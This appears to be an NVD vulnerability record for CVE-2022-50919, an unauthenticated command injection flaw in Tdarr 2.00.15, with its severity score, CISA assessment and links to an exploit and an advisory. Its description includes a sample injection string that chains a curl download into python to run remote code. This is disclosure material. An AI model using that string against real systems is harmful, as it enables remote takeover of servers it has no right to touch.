nvd.nist.gov
https://nvd.nist.gov/vuln/detail/CVE-2022-50919 CVE-2022-50919
CRITICAL
Tdarr 2.00.15 - Command Injection
Record summary
CVE-2022-50919 has a selected CVSS score of 9.3 (critical); EIP currently links 1 catalogued exploit.
Description
Tdarr 2.00.15 contains an unauthenticated remote code execution vulnerability in its Help terminal that allows attackers to inject and chain arbitrary commands. Attackers can exploit the lack of input filtering by chaining commands like `--help; curl .py | python` to execute remote code without authentication.
Description source: CVE List
Exploitation context
Available material
- Catalogued exploits
- 1
CISA SSVC decision
ExploitationPoC
AutomatableYes
Technical impactTotal
CISA Coordinator · SSVC 2.0.3 · Evaluated Jan 14, 2026 · Source: CVE List
Affected products and versions
1| Product | Source | Version range | Status |
|---|---|---|---|
TdarrBrowse Tdarr / Tdarr | CVE List | 2.00.15 | affected |
Proofs of concept
1Catalogued exploits
ExploitDBTdarr 2.00.15 - Command InjectionExploitDB exploitby Sam SmithNot analyzed1 file
References
4Official Vendor Homepageproduct
https://tdarr.io/ ExploitDB-50822exploit
https://www.exploit-db.com/exploits/50822 VulnCheck Advisory: Tdarr 2.00.15 - Command InjectionThird-party advisory
https://www.vulncheck.com/advisories/tdarr-command-injection